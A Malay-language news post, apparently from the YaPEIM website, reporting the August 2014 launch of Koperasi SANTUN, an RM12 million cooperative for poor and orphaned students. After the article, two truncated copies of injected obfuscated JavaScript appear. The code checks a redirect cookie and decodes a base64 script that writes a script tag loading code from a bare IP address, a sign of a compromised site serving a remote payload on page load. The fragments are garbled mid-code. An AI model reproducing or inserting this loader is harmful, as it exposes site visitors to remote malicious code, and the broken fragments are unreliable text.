YaPEIM » Jamil Khir Lancarkan Koperasi RM12 Juta untuk warga pelajar miskin/Yatim

Terkini

Jamil Khir Lancarkan Koperasi RM12 Juta untuk warga pelajar miskin/Yatim

Majlis dilancarkan oleh Y.A.B Mejar Jeneral Dato’ Seri Jamil Khir Bin Hj Baharom di Times Square Hotel

KUALA LUMPUR, 25 Ogos 2014: Menteri di Jabatan Perdana Menteri, Mejar Jeneral Dato’ Seri Jamil Khir Baharom malam ini  melancarkan Koperasi SANTUN, warga pelajar miskin/Yatim dengan permulaan peruntukan dari YaPEIM sebanyak RM12 juta.

Beliau berkata, Koperasi ini mempunyai dana asas yang diperuntukkan oleh YaPEIM melalui PEMANGKIN kepada setiap warga SANTUN yang menyertai koperasi ini atas nama Sumbangan  Saham Ahli (iaitu sejumlah RM500.00 seorang setahun selama minimum 6 tahun).

“Ertinya setiap warga SANTUN layak menerima peruntukkan saham ahli secara percuma pada jumlah   RM3,000 seorang, dan dengan jumlah warga SANTUN seramai 4,000 orang pada penghujung tahun ini, maka bagi tempoh 6 tahun,  dana daripada saham ahli yang akan diuruskan oleh koperasi adalah sejumlah RM12 juta.

“Dana awal ini berpotensi bertambah pada jumlah gandaan yang lebih besar, apabila setiap ahli bersedia memanfaatkan koperasi sebagai tempat membuat simpanan dan pengeluaran bagi keperluan harian,” katanya.

Beliau berkata demikian dalam Majlis perasmian Perkhemahan Nasional Santun 2014 dan Pelancaran Koperasi Santun di Times Square Hotel di sini, malam tadi

Turut hadir Presiden  dan Pengerusi YaPEIM, Dato’ Abd Malek Awang Kechil; Timbalannya, Datuk Hajah Zaleha Husin dan Ketua Pengarah YaPEIM, Dato’ Abibullah Samsudin.Warga Santun pada awal penubuhan hanya 491 orang pada tahun 1992 dan kini jumlahnya 3,600.

Jamil Khir yakin Koperasi SANTUN akan menjadi salah satu koperasi yang akan memberi faedah kepada anak-anak daripada kalangan pelajar cemerlang miskin dan yatim.

“Felda juga tidaklah berdiri automatik gagah tetapi melalui proses-proses tertentu, tetapi kini Felda telah menjadi satu syarikat terkemuka di negara ini dan telah tersenarai di Bursa Malaysia.

“Yang penting ahli-ahli koperasi berpegang kepada prinsip untuk memahami dan menghormati kepimpinan. Mesti ada wala’ (patuh kepada pucuk pimpinan).

“Saya ingin melihat Koperasi ini utama ahli-ahlinya akan melahirkan  ketua eksekutf di syarikat terkemuka dalam negara atau menjadi jutawan.  Banggalah menjadi salah satu ahli yang bernaung di bawah YaPEIM yang aktivitinya sentiasa patuh syariah,” katanya.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top